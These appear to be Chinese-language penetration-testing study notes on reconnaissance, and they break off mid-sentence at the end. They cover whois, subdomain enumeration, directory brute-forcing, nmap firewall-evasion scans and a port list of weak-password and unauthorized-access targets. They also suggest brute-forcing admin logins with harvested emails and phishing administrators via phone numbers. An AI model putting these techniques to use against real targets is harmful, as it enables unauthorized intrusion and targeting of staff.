信息搜集概念

信息收集是指黑客为了更加有效地实施渗透攻击而在攻击前或攻击过程中对目标的所有探测活动

搜集什么信息

信息搜集的目的

信息搜集的目的只有一个,通过搜集信息得知漏洞信息去利用

主动搜集和被动搜集

主动信息搜集 是使用网站的直接访问,扫描网站,以及探测网站产生交互的被称之为主动搜集. 被动信息搜集 是以通过你第三方来进行信息搜集

信息搜集的流程

whois

whois信息可以查询到注册域名的详细信息的数据库
whois通常使用tcp协议43端口.每个域名/ip的whois信息由对应的管理机构保存.
推荐站长之家api调用

image-20210323150835126

1640497684134

  • dmitry(kali自带)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92

┌──(root💀B)-[~]
└─# dmitry -iwns dansemal.cn
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:183.240.60.175
HostName:dansemal.cn

Gathered Inet-whois information for 183.240.60.175
---------------------------------


inetnum: 182.161.64.0 - 184.255.255.255
netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
descr: IPv4 address block not managed by the RIPE NCC
remarks: ------------------------------------------------------
remarks:
ration information,
remarks: you can consult the following sources:
remarks:
remarks: IANA
remarks: http://www.iana.org/assignments/ipv4-address-space
remarks: http://www.iana.org/assignments/iana-ipv4-special-registry
remarks: http://www.iana.org/assignments/ipv4-recovered-address-space
remarks:
remarks: AFRINIC (Africa)
remarks: http://www.afrinic.net/ whois.afrinic.net
remarks:
remarks: APNIC (Asia Pacific)
ic.net/ whois.apnic.net
remarks:
remarks: ARIN (Northern America)
remarks: http://www.arin.net/ whois.arin.net
remarks:
remarks: LACNIC (Latin America and the Carribean)
remarks: http://www.lacnic.net/ whois.lacnic.net
remarks:
remarks: ------------------------------------------------------
country: EU # Country is really world wide
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
status: ALLOCATED UNSPECIFIED

created: 2021-12-21T16:03:56Z
last-modified: 2021-12-21T16:03:56Z
source: RIPE
role: Internet Assigned Numbers Authority
address: see http://www.iana.org.
admin-c: IANA1-RIPE
tech-c: IANA1-RIPE
nic-hdl: IANA1-RIPE
remarks: For more information on IANA services
remarks: go to IANA web site at http://www.iana.org.
mnt-by: RIPE-NCC-MNT
created: 1970-01-01T00:00:00Z
last-modified: 2001-09-22T09:31:27Z
source: RIPE # Filtered
% This query was served by the RIPE Database Query Service version 1.102.2 (HEREFORD)



Gathered Inic-whois information for dansemal.cn
---------------------------------
Domain Name: dansemal.cn
ROID: 20210322s10001s35063278-cn
Domain Status: clientTransferProhibited
Registrant: 该域名已采取WHOIS隐私保护服务
Sponsoring Registrar: 广州云讯信息科技有限公司
Name Server: brook.dnspod.net
Name Server: record.dnspod.net
Registration Time: 2021-03-22 15:32:05
Expiration Time: 2023-03-22 15:32:05
DNSSEC: signedDelegation

Gathered Netcraft information for dansemal.cn
---------------------------------

Retrieving Netcraft.com information for dansemal.cn
Netcraft.com Information gathered

Gathered Subdomain information for dansemal.cn
---------------------------------
Searching Google.com:80...
HostName:www.dansemal.cn
HostIP:183.240.60.174
HostName:cloud.dansemal.cn
HostIP:112.3.31.146
Searching Altavista.com:80...
Found 2 possible subdomain(s) for host dansemal.cn, Searched 0 pages containing 0 results

All scans completed, exiting

邮箱搜集

在信息搜集的过程中,邮箱信息可以解决我们很大的问题,我们可以fuzz邮箱的密码进行爆破后台.

theHarvester

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
┌──(root💀kali)-[~]
└─# theHarvester -d freebuf.com -b baidu 2 ⨯

*******************************************************************
* _ _ _ *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* theHarvester 3.2.3 *
* Coded by Christian Martorella *
* Edge-Security Research *
* c[email protected] *
* *
*******************************************************************


[*] Target: freebuf.com

[*] Searching Baidu.

[*] No IPs found.

[*] No emails found.

[*] Hosts found: 8
---------------------
bar.freebuf.com:60.205.171.29
company.freebuf.com:60.205.171.29
job.freebuf.com:60.205.171.29
live.freebuf.com:60.205.171.29
my.freebuf.com:60.205.171.29
search.freebuf.com:60.205.171.29
shop.freebuf.com:60.205.171.29
www.freebuf.com:60.205.171.29

┌──(root💀kali)-[~]
└─# theHarvester -d dansemal.github.io -b baidu

*******************************************************************
* _ _ _ *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* theHarvester 3.2.3 *
* Coded by Christian Martorella *
* Edge-Security Research *
* c[email protected] *
* *
*******************************************************************


[*] Target: dansemal.github.io

[*] Searching Baidu.

[*] No IPs found.

[*] No emails found.

[*] No hosts found.

手机号

手机号在信息搜集的时候也略显重要,因为我们可以通过手机号去查到关于管理人员的更多信息,甚至可以通过反查微信钓鱼的方式来进行,或者其他的方式.

主动信息搜集

  • 指通过一定的方式(系统自带命令或者其他工具),直接与目标系统或者主机进行交互通信,以达到收集信息的目的。
  • 主动信息收集的必要条件
    使用受控的第3三方电脑进行探测
  • 使用代理或者已经被控制的主机
  • 做好被封杀的准备
    使用噪声迷惑目标,掩藏真实的的探测流量扫描
  • 发送不同的探测,根据返回结果判断目标状态
    主动信息收集的发现过程
  • 识别存活的目标系统或者主机(潜在的攻击目标)。
  • 根据osi的分层,主要在2 (数据链路层) /3 (网络层) /4 (传输层)层进行主机发现。
  • 输出发现结果。

收集所需信息

  • 开放端口
  • 开放服务
  • 服务版本
  • 用户名
  • 域名
  • 网站系统
  • 历史信息
  • 身份信息

代理隐蔽

  • 在主动信息过程中,可能会存在-一定被IPS/IDS检测到,我们可以使用proxychains这款工具来
    达到代理的效果
  • 或在Windows中使用Proxifier。

主机发现

在二层网络中,使用arping发现主机

  • netdiscover
1
2
┌──(root💀B)-[~]
└─# netdiscover -i eth0 -r 192.168.0.1/24

netdiscover -l 文件路径 (扫描文件ip)

netdiscover -p 被动扫描

  • fping

Fping程序类似于ping (ping是通过ICMP. (网络控制信息协议InternetControl Message
Protocol)协议回复请求以检测主机是否存在)。Fping 与ping不同的地方在于,fping可以在
命令行中指定要ping的主机数量范围,也可以指定含有要ping的主机列表文件。

  • hping3

Hping能够发送几乎任意的TCP/IP包;
功能强大但是每次只能扫描一个目标。
Hping3发送ICMP包:
hping3 192.168.181.130 --icmp -C 2

子域名搜集

  • https://phpinfo.me/domain/ ps.查看源代码其实是个自带字典本地子域名工具

  • altdns

  • oneforall

  • layer子域名挖掘机

  • subDomainBrute


    安装常见问题 默认 python pip 版本不对应
    更换默认python版本为3 安装pip3

  • wydomain

  • sublist3r

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    af install sublist3r #kali下

    ┌──(root💀kali)-[~]
    └─# sublist3r -d qq.com 130 ⨯

    ____ _ _ _ _ _____
    / ___| _ _| |__ | (_)___| |_|___ / _ __
    \___ \| | | | '_ \| | / __| __| |_ \| '__|
    ___) | |_| | |_) | | \__ \ |_ ___) | |
    |____/ \__,_|_.__/|_|_|___/\__|____/|_|

    # Coded By Ahmed Aboul-Ela - @aboul3la

    [-] Enumerating subdomains now for qq.com
    [-] Searching now in Baidu..
    [-] Searching now in Yahoo..
    [-] Searching now in Google..
    [-] Searching now in Bing..
    [-] Searching now in Ask..
    [-] Searching now in Netcraft..
    [-] Searching now in DNSdumpster..
    [-] Searching now in Virustotal..
    [-] Searching now in ThreatCrowd..
    [-] Searching now in SSL Certificates..
    [-] Searching now in PassiveDNS..
    [-] Total Unique Subdomains Found: 2690
    login.imqq.com
    localhost.ptlogin2.imqq.com
    ssl.ptlogin2.imqq.com
    ssl.ui.ptlogin2.imqq.com
    ssl.xui.ptlogin2.imqq.com
    www.qq.com
    0.qq.com
    007.qq.c
    021.qq.com
    1.qq.com
    10.qq.com
    100.qq.com
    file.100.qq.com
    res.100.qq.com
    1000.qq.com
    101.qq.com
    pick.101.qq.com
    game.108.qq.com
    110.qq.com
    1108.qq.com
    111.qq.com
    1111.qq.com
    124bjg0.qq.com
    12530.qq.com
    176.qq.com
    17roco.qq.com
    m.17roco.qq.com
    m1.17roco.qq.com
    mres.17roco.qq.com


    ┌──(root💀B)-[~]
    └─# sublist3r -d dansemal.cn

    ____ _ _ _ _ _____
    / ___| _ _| |__ | (_)___| |_|___ / _ __
    \___ \| | | | '_ \| | / __| __| |_ \| '__|
    ___) | |_| | |_) | | \__ \ |_ ___) | |
    |____/ \__,_|_.__/|_|_|___/\__|____/|_|

    # Coded By Ahmed Aboul-Ela - @aboul3la

    [-] Enumerating subdomains now for dansemal.cn
    [-] Searching now in Baidu..
    [-] Searching now in Yahoo..
    [-] Searching now in Google..
    [-] Searching now in Bing..
    [-] Searching now in Ask..
    [-] Searching now in Netcraft..
    [-] Searching now in DNSdumpster..
    [-] Searching now in Virustotal..
    [-] Searching now in ThreatCrowd..
    [-] Searching now in SSL Certificates..
    [-] Searching now in PassiveDNS..
    [!] Error: Virustotal probably now is blocking our requests
    [-] Total Unique Subdomains Found: 12
    www.dansemal.cn
    blog.dansemal.cn
    cdn.dansemal.cn
    cloud.dansemal.cn
    joe.dansemal.cn
    mail.dansemal.cn
    pl.dansemal.cn
    qh.dansemal.cn
    ur.dansemal.cn
    vercel.dansemal.cn
    vul.dansemal.cn
    waline.dansemal.cn



网站架构

  • nikto(kali自带)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
Options:
-ask+ 是否询问提交更新
yes 每次 (default)
no 不询问,不发送
auto 不询问,自动发送
-Cgidirs+ 扫描CGI目录: "none", "all", 或者 "/cgi/ /cgi-a/"
-config+ 使用此配置文件
-Display+ 打开/关闭显示输出:
1 显示重定向
2 显示 cookies received
3 显示所有 200/OK响应
4 显示需要身份验证的URL
D 调试输出
E 显示所有HTTP错误
P 打印进展到STDOUT
S Scrub输出IPS和主机名
V 详细输出
-dbcheck 检查数据库和其他密钥文件的语法错误
-evasion+ 编码技术:
1 随机URI编码(非UTF8)
2 目录自我引用 (/./)
3 Premature URL ending
4 预置长随机字符串
5 Fake parameter
6 TAB as request spacer
7 Change the case of the URL
8 Use Windows directory separator (\)
A Use a carriage return (0x0d) as a request spacer
B Use binary value 0x0b as a request spacer
-Format+ Save file (-o) format:
csv Comma-separated-value
json JSON Format
htm HTML Format
nbe Nessus NBE format
sql Generic SQL (see docs for schema)
txt Plain text
xml XML Format
(if not specified the format will be taken from the file extension passed to -output)
-Help Extended help information
-host+ Target host/URL
-404code Ignore these HTTP codes as negative responses (always). Format is "302,301".
-404string Ignore this string in response body content as negative response (always). Can be a regular expression.
-id+ Host authentication to use, format is id:pass or id:pass:realm
-key+ Client certificate key file
-list-plugins List all available plugins, perform no testing
-maxtime+ Maximum testing time per host (e.g., 1h, 60m, 3600s)
-mutate+ Guess additional file names:
1 Test all files with all root directories
2 Guess for password file names
3 Enumerate user names via Apache (/~user type requests)
4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
5 Attempt to brute force sub-domain names, assume that the host name is the parent domain
6 Attempt to guess directory names from the supplied dictionary file
-mutate-options Provide information for mutates
-nointeractive Disables interactive features
-nolookup Disables DNS lookups
-nossl Disables the use of SSL
-no404 Disables nikto attempting to guess a 404 page
-Option Over-ride an option in nikto.conf, can be issued multiple times
-output+ Write output to this file ('.' for auto-name)
-Pause+ Pause between tests (seconds, integer or float)
-Plugins+ List of plugins to run (default: ALL)
-port+ Port to use (default 80)
-RSAcert+ Client certificate file
-root+ Prepend root value to all requests, format is /directory
-Save Save positive responses to this directory ('.' for auto-name)
-ssl Force ssl mode on port
-Tuning+ Scan tuning:
1 Interesting File / Seen in logs
2 Misconfiguration / Default File
3 Information Disclosure
4 Injection (XSS/Script/HTML)
5 Remote File Retrieval - Inside Web Root
6 Denial of Service
7 Remote File Retrieval - Server Wide
8 Command Execution / Remote Shell
9 SQL Injection
0 File Upload
a Authentication Bypass
b Software Identification
c Remote Source Inclusion
d WebService
e Administrative Console
x Reverse Tuning Options (i.e., include all except specified)
-timeout+ Timeout for requests (default 10 seconds)
-Userdbs Load only user databases, not the standard databases
all Disable standard dbs and load only user dbs
tests Disable only db_tests and load udb_tests
-useragent Over-rides the default useragent
-until Run until the specified time or duration
-update Update databases and plugins from CIRT.net
-url+ Target host/URL (alias of -host)
-useproxy Use the proxy defined in nikto.conf, or argument http://server:port
-Version Print plugin and database versions
-vhost+ Virtual host (for Host header)
+ requires a value
  • wappalyzer(浏览器插件)

常见网站架构的类型

1.php+mysql+win/linux

1
1.2003 iis6.0/2008 iis7.0/2012 iis8.0
1
2. apache
1
3.nginx

2.aspx+access/mssql+win 3. 3.jsp+oracle/mysql/+win/linux

1
1.tomcat

4.php+postgresql+linux

目录信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
Usage: dirsearch.py [-u|--url] target [-e|--extensions] extensions [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit

Mandatory:
-u URL, --url=URL Target URL
-l FILE, --url-list=FILE
Target URL list file
--stdin Target URL list from STDIN
--cidr=CIDR Target CIDR
--raw=FILE Load raw HTTP request from file (use `--scheme` flag
to set the scheme)
-e EXTENSIONS, --extensions=EXTENSIONS
Extension list separated by commas (Example: php,asp)
-X EXTENSIONS, --exclude-extensions=EXTENSIONS
Exclude extension list separated by commas (Example:
asp,jsp)
-f, --force-extensions
Add extensions to every wordlist entry. By default
dirsearch only replaces the %EXT% keyword with
extensions

Dictionary Settings:
-w WORDLIST, --wordlists=WORDLIST
Customize wordlists (separated by commas)
--prefixes=PREFIXES
Add custom prefixes to all wordlist entries (separated
by commas)
--suffixes=SUFFIXES
Add custom suffixes to all wordlist entries, ignore
directories (separated by commas)
--only-selected Remove paths have different extensions from selected
ones via `-e` (keep entries don't have extensions)
--remove-extensions
Remove extensions in all paths (Example: admin.php ->
admin)
-U, --uppercase Uppercase wordlist
-L, --lowercase Lowercase wordlist
-C, --capital Capital wordlist

General Settings:
-t THREADS, --threads=THREADS
Number of threads
-r, --recursive Brute-force recursively
--deep-recursive Perform recursive scan on every directory depth
(Example: api/users -> api/)
--force-recursive Do recursive brute-force for every found path, not
only paths end with slash
-R DEPTH, --recursion-depth=DEPTH
Maximum recursion depth
--recursion-status=CODES
Valid status codes to perform recursive scan, support
ranges (separated by commas)
--subdirs=SUBDIRS Scan sub-directories of the given URL[s] (separated by
commas)
--exclude-subdirs=SUBDIRS
Exclude the following subdirectories during recursive
scan (separated by commas)
-i CODES, --include-status=CODES
Include status codes, separated by commas, support
ranges (Example: 200,300-399)
-x CODES, --exclude-status=CODES
Exclude status codes, separated by commas, support
ranges (Example: 301,500-599)
--exclude-sizes=SIZES
Exclude responses by sizes, separated by commas
(Example: 123B,4KB)
--exclude-texts=TEXTS
Exclude responses by texts, separated by commas
(Example: 'Not found', 'Error')
--exclude-regexps=REGEXPS
Exclude responses by regexps, separated by commas
(Example: 'Not foun[a-z]{1}', '^Error$')
--exclude-redirects=REGEXPS
Exclude responses by redirect regexps or texts,
separated by commas (Example: 'https://okta.com/*')
--exclude-response=PATH
Exclude responses by response of this page (path as
input)
--skip-on-status=CODES
Skip target whenever hit one of these status codes,
separated by commas, support ranges
--minimal=LENGTH Minimal response length
--maximal=LENGTH Maximal response length
--max-time=SECONDS Maximal runtime for the scan
-q, --quiet-mode Quiet mode
--full-url Full URLs in the output (enabled automatically in
quiet mode)
--no-color No colored output

Request Settings:
-m METHOD, --http-method=METHOD
HTTP method (default: GET)
-d DATA, --data=DATA
HTTP request data
-H HEADERS, --header=HEADERS
HTTP request header, support multiple flags (Example:
-H 'Referer: example.com')
--header-list=FILE File contains HTTP request headers
-F, --follow-redirects
Follow HTTP redirects
--random-agent Choose a random User-Agent for each request
--auth-type=TYPE Authentication type (basic, digest, bearer, ntlm)
--auth=CREDENTIAL Authentication credential (user:password or bearer
token)
--user-agent=USERAGENT
--cookie=COOKIE

Connection Settings:
--timeout=TIMEOUT Connection timeout
-s DELAY, --delay=DELAY
Delay between requests
--proxy=PROXY Proxy URL, support HTTP and SOCKS proxies (Example:
localhost:8080, socks5://localhost:8088)
--proxy-list=FILE File contains proxy servers
--replay-proxy=PROXY
Proxy to replay with found paths
--scheme=SCHEME Default scheme (for raw request or if there is no
scheme in the URL)
--max-rate=RATE Max requests per second
--retries=RETRIES Number of retries for failed requests
-b, --request-by-hostname
By default dirsearch requests by IP for speed. This
will force dirsearch to request by hostname
--ip=IP Server IP address
--exit-on-error Exit whenever an error occurs

Reports:
-o FILE, --output=FILE
Output file
--format=FORMAT Report format (Available: simple, plain, json, xml,
md, csv, html)

You can change the dirsearch default configurations (default extensions,
timeout, wordlist location, ...) by editing the "/etc/dirsearch/default.conf"
file. More information at https://github.com/maurosoria/dirsearch.
  • 御剑后台扫描工具
  • dirbuster
  • pk
  • dirmap

端口扫描

  • nmap

1
2
3
4
5
6
7
8
9
10
nmap -all ip
-sT 使用tcp进行扫描
-sS 半开放扫描
-sU udp端口扫描
-sF 也是tcp的扫描一种,发送一个fin标志的数据包
-sV 版本检测
-O 可以模糊测试对方系统版本PING大于67则windows
-A 全面检测
-sV 探测目标系统服务版本
-T4 设置线程
nmap绕过防火墙扫描
1
2
3
4
5
6
7
8
9
10
nmap --script=firewalk --traceroute 目标
nmap -p80 --script http-waf-detect --script-args="http-waf-detect.detectBodyChanges"
碎片扫描namp -f nmap -mtu 8
诱饵扫描nmap -D RND:10
空闲扫描nmap -P0 -sl zombie
随机数据长度扫描 nmap --data-length 25
欺骗性扫描nmap --sT -PN --spoof-mac aa:bb:cc:dd:ee:ff
namp --badsum 主机
nmap -g80 -S url 主机
nmap -p80 --script http-methods --script-args http.useragent="Mozilla 5"
ipc共享

IPC$ (Internet Process Connection) 是共享命名管道”的资源,它是为了让进程间通信而开放
的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行
加密数据的交换,从而实现对远程计算机的访问。IPCNT2000的一项新功能,它有一个特点,即在同时间内,两个IP之间只允许建立一个连接。NT2000在提供了ipc是NT2000的一 项新功能,它有一个特 点,即在同- -时间内,两个IP之间只允许建立一个连接。 NT2000在提供 了ipc功能的同时,
在初次安装系统时还打开了默认共享,即所有的逻辑共享(CD、D、 …和系统目录
(C:\windows)共享。所有的这些初衷都是为了方便管理员的管理。但好的初衷并不一-定 要
收效,一些别有用心者会利用IPC,访问共享资源,导出用户列表,并使用些字典工为了配合IPC共享工作,Windows操作系统(不包括Windows98系列)在安装完成后,目动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:Windows)等,即为ADMIN,访问共享资源,导出用户列表,并使用- -些字典工 为了配合IPC共享工作,Windows操作系统(不包括Windows 98系列)在安装完成后,目动 设置共享的目录为: C盘、D盘、E盘、ADMIN目录(C:Windows)等,即为ADMIN、CD、 D、E$等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。

1
nmap --script=smb-enum-shares.nse -sT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
┌──(root💀kali)-[~]
└─# nmap -v -A -p1-65535 127.0.0.1
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 13:58 CST
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating SYN Stealth Scan at 13:58
Scanning localhost (127.0.0.1) [65535 ports]
Discovered open port 22/tcp on 127.0.0.1
Completed SYN Stealth Scan at 13:58, 0.37s elapsed (65535 total ports)
Initiating Service scan at 13:58
Scanning 1 service on localhost (127.0.0.1)
Completed Service scan at 13:58, 0.01s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against localhost (127.0.0.1)
Retrying OS detection (try #2) against localhost (127.0.0.1)
Retrying OS detection (try #3) against localhost (127.0.0.1)
Retrying OS detection (try #4) against localhost (127.0.0.1)
Retrying OS detection (try #5) against localhost (127.0.0.1)
NSE: Script scanning 127.0.0.1.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.08s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000018s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 95:24:8a:70:02:c1:7c:b9:63:1d:57:bd:c4:ba:59:84 (RSA)
| 256 ac:24:26:ce:c9:34:47:e7:62:38:13:d1:03:6d:c7:54 (ECDSA)
|_ 256 79:e3:be:ae:1e:ee:87:ed:bd:3d:b3:23:e6:de:92:08 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/10%OT=22%CT=1%CU=43844%PV=N%DS=0%DC=L%G=Y%TM=60713E8
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=MFFD7ST11NWA%O2=MFFD7ST11NWA%O3=MFFD7NNT11NWA%O4=MFFD7ST11NWA%O5=MFF
OS:D7ST11NWA%O6=MFFD7ST11)WIN(W1=FFCB%W2=FFCB%W3=FFCB%W4=FFCB%W5=FFCB%W6=FF
OS:CB)ECN(R=Y%DF=Y%T=40%W=FFD7%O=MFFD7NNSNWA%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Uptime guess: 22.103 days (since Fri Mar 19 11:30:10 2021)
Network Distance: 0 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Initiating NSE at 13:58
Completed NSE at 13:58, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds
Raw packets sent: 65645 (2.892MB) | Rcvd: 131283 (5.520MB)
  • 御剑端口扫描

image-20210410140746650

公开漏洞库利用

SCAPY 网络信息

使用SCAPY创立发送数据包
pkt=IP(src=“192.168.0.7” ,dst=“39.156.69.79”)/TCP()
●res=sr1(pkt) /接收res. summary() //查看
●sr() /接受全部.
●send() //只发送.
发送两层数据包
●srp()
●srp1()
●sendp()

发送tcp数据包
1
2
3
4
5
6
7
ip=IP()
tcp=TCP()
ip.dst="192.168.0.6"
ip.dport=445
tcp.flags='A'
sr1(ip)
sr1(IP(dst="www.baidu.com")/TCP(dport=[21,80,3389],flags='A'))

被动信息搜集

谷歌语法

谷歌语法数据库

旁站搜集

https://www.webscan.cc/

dig

dig可以查询到域名dns记录,对此可以查询到对应ip 参数+trance可以进行跟踪

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root💀B)-[~]
└─# dig dansemal.cn

; <<>> DiG 9.17.21-1-Debian <<>> dansemal.cn
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49678
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1024
;; QUESTION SECTION:
;dansemal.cn. IN A

;; AUTHORITY SECTION:
dansemal.cn. 3600 IN SOA ns3.dnsv4.com. enterprise2dnsadmin.dnspod.com. 1639057957 3600 180 1209600 180

;; Query time: 76 msec
;; SERVER: 192.168.0.2#53(192.168.0.2) (UDP)
;; WHEN: Mon Jan 10 18:47:49 CST 2022
;; MSG SIZE rcvd: 116

指纹信息

信息泄露搜集

SVN信息泄露

image-20220105192643897

文件泄露

image-20220105192830602

git泄露

image-20220105193415382

robots.txt泄露

1
2
3
4
5
6
┌──(root💀B)-[~]
└─# curl www.dansemal.cn/robots.txt
User-agent: *
Allow: /

Sitemap: https://www.dansemal.cn/sitemap.xml

危险端口搜集

web类(web漏洞/敏感目录)

第三方通用组件漏洞struts thinkphp jboss ganglia zabbix
80 web
80-89 web
8000-9090 web

数据库类(扫描弱口令)

1433 MSSQL
1521 Oracle
3306 MySQL
5432 PostgreSQL

特殊服务类(未授权/命令执行类/漏洞)

443 SSL心脏滴血
873 Rsync未授权
5984 CouchDB http://xxx:5984/_utils/
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问

常用端口类(扫描弱口令/端口爆破)

21 ftp
22 SSH
23 Telnet
2601,2604 zebra路由,默认密码zebra
3389 远程桌面

端口合计详情

21 ftp
22 SSH
23 Telnet
80 web
80-89 web
161 SNMP
389 LDAP
443 SSL心脏滴血以及一些web漏洞测试
445 SMB

512,513,514 Rexec
873 Rsync未授权
1025,111 NFS
1433 MSSQL
1521 Oracle:(iSqlPlus Port:5560,7778)
2082/2083 cpanel主机管理系统登陆 (国外用较多)
2222 DA虚拟主机管理系统登陆 (国外用较多)
2601,2604 zebra路由,默认密码zebra
3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了
3306 MySQL
3312/3311 kangle主机管理系统登陆
3389 远程桌面
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网
5432 PostgreSQL
5900 vnc
5984 CouchDB http://xxx:5984/_utils/
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
7778 Kloxo主机控制面板登录
8000-9090 都是一些常见的web端口,有些运维喜欢把管理后台开在这些非80的端口上
8080 tomcat/WDCP主机管理系统,默认弱口令
8080,8089,9090 JBOSS
8083 Vestacp主机管理系统 (国外用较多)
8649 ganglia
8888 amh/LuManager 主机管理系统默认端口
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
10000 Virtualmin/Webmin 服务器虚拟主机管理系统
11211 memcache未授权访问
27017,27018 Mongodb未授权访问
28017 mongodb统计页面
50000 SAP命令执行
50070,50030 hadoop默认端口未授权访问

内网信息收集

内网信息收集的概念

内网是分布在一个区域性的网络,也称之为局域网,针对于内网不公开于互联网之上,内网分
为好几种类型,有服务器内网、办公区域内网等等,内网可以方便的传输,以及可以保证其数
